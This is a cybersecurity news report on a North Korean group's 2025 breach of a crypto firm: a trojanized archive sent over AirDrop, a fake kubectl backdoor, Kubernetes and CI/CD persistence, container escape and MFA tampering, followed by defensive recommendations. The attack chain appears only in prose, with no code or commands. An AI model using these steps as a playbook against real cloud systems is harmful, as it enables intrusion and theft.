North Korean UNC4899 Group Breaches Crypto Firm via Trojanized AirDrop File
March 9, 2026 — By Ravie Lakshmanan, The Hacker News
A sophisticated cyberattack attributed to the North Korean state-sponsored threat actor UNC4899 has compromised a cryptocurrency organization, resulting in millions of dollars in digital asset theft. The campaign, which unfolded in 2025, exploited a novel blend of social engineering tactics, peer-to-peer (P2P) file transfer vulnerabilities, and advanced cloud exploitation techniques, according to the latest report from a leading technology company detailed in the H1 2026 Cloud Threat Horizons Report.
Attack Vector: From Developer’s Device to Cloud Environment
The initial breach began when UNC4899 operatives deceived a developer at the targeted crypto firm into downloading a trojanized archive disguised as part of an open-source collaboration. The developer transferred this malicious file from their personal device to their corporate workstation using AirDrop, a P2P file-sharing feature.
Upon opening the archive via their AI-assisted Integrated Development Environment (IDE), the developer inadvertently executed embedded Python malware. This led to spawning a binary disguised as the legitimate Kubernetes command-line tool (kubectl). The malicious binary established a backdoor by connecting to an attacker-controlled domain, enabling UNC4899 to gain persistent access to the developer’s corporate machine.
Escalation and Cloud Compromise
Leveraging authenticated sessions and harvested credentials, the attackers pivoted from the corporate workstation to the firm’s Google Cloud environment. Initial reconnaissance identified a bastion host, whose multi-factor authentication (MFA) policies the attacker altered to ensure access. Diving deeper, they navigated Kubernetes pods critical to the company infrastructure.
UNC4899 employed a ‘living-off-the-cloud’ (LotC) strategy to maintain persistence by modifying Kubernetes deployment configurations. This allowed automatic execution of bash commands downloading backdoors with every new pod instantiation.
Further malicious activities included:
- Injecting commands into Kubernetes resources tied to the company’s Continuous Integration/Continuous Deployment (CI/CD) platform to expose service account tokens via logs.
- Acquiring a high-privileged CI/CD service account token enabling privilege escalation and lateral movement.
- Escaping container confinement using privileged pods to implant additional backdoors, ensuring long-term access.
- Conducting extensive reconnaissance focused on customer data management workloads containing sensitive user identities and wallet information.
- Extracting static database credentials stored insecurely within pod environment variables.
- Accessing production databases through Cloud SQL Auth Proxy to alter user accounts, reset passwords, and update MFA seeds for high-value targets.
Impact and Lessons Learned
The attackers ultimately used compromised accounts to withdraw several million dollars in cryptocurrency. Google’s security team emphasized that the incident “highlights the critical risks posed by personal-to-corporate P2P data transfer methods and other data bridges, privileged container modes, and the unsecured handling of secrets in a cloud environment.”
The case illustrates the evolving threat landscape where threat actors blend social engineering with cloud-native attack techniques, exploiting DevOps workflows and container orchestration platforms like Kubernetes to escalate privileges and compromise critical infrastructure.
Recommendations to Mitigate Similar Threats
To defend against such attacks, organizations should:
- Implement rigorous defense-in-depth strategies with strong identity validation.
- Enforce policies that restrict or disable peer-to-peer file sharing protocols such as AirDrop or Bluetooth on corporate devices.
- Apply phishing-resistant MFA solutions and context-aware access controls.
- Employ robust secrets management to avoid hardcoding or exposing credentials in environment variables.
- Ensure container runtime environments enforce strong isolation and monitor for abnormal processes.
- Isolate compromised nodes to prevent lateral movement within cloud infrastructures.
- Rely solely on trusted container images and restrict deployment of unauthorized code.
About UNC4899
UNC4899, also known by cryptonyms such as Jade Sleet, PUKCHONG, Slow Pisces, and TraderTraitor, is a North Korean threat actor linked to state-sponsored cyber espionage and financially motivated attacks targeting cryptocurrency firms and other high-value entities.
Stay informed on cybersecurity threats and defenses by following The Hacker News on Google News, Twitter, and LinkedIn.
© 2026 The Hacker News. All rights reserved.